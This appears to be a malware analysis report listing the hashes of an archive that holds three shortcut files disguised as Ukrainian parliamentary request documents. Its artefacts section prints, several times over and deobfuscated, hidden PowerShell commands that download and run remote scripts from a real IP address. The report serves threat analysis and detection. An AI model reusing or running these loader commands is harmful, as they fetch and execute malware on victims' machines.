Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
8a6d715d998459360a3a230711bef80e
Sha1
2ec60b598afbf860f633bec88e906e3bd71b9929
Sha256
a1e2620cff9e1612e0f50d13b3d9f0295079cd4e7b6b8a338a3a39aa8fd2c7c2
Sha384
87797783649255c05e8779c8d3c46e6bc5b8b1d8a048993629a2da829ffb29f46576f269505269e9cd9af4b7243e724a
Sha512
69e107f4b4999a20262831cfd9dc2e9ae095037380acd971b78c5c6c649ec83ce892a506d6f8d1b154e7c4815d59a65fbc43c1b2fbd93c82ff58f621824f8495
SSDeep
96:Yc3+udf7i4A268YY+/+udf7i438Vhka+udf7i468F3G+5kH:Yo+udf7i4uxL+udf7i43Mb+udf7i46o2
TLSH
09A4E024A3F51F08F1B7AA7E9D7A2B5888727B1CDB21D74C0214A0891C71B54E835F3B
File Structure
8a6d715d998459360a3a230711bef80e
Malicious
Dodatok_do_zapitu.xlsx.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Scan_zapitu_iz_verhovnoi_radi.rtf.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Zapit_iz_verhovnoi_radi.docx.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/tracekitten.ps1') })))
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/ospreybonfire.ps1') })))
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/violabanner.ps1') })))
Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/ospreybonfire.ps1"))))
Deobfuscated PowerShell

shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "11/17/2025" "10:08:21" "PM" accesstime: "11/17/2025" "10:08:21" "PM" writetime: "11/17/2025" "10:08:21" "PM" filesize: 0 0 iconindex: 85 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "Rich" "????xt" "D??cument" workingdir: "%LOCALAPPDATA%" commandlinearguments: -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/ospreybonfire.ps1")))) iconlocation: "imageres.dll"
Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/tracekitten.ps1"))))
Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/violabanner.ps1"))))
8a6d715d998459360a3a230711bef80e (467.05 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙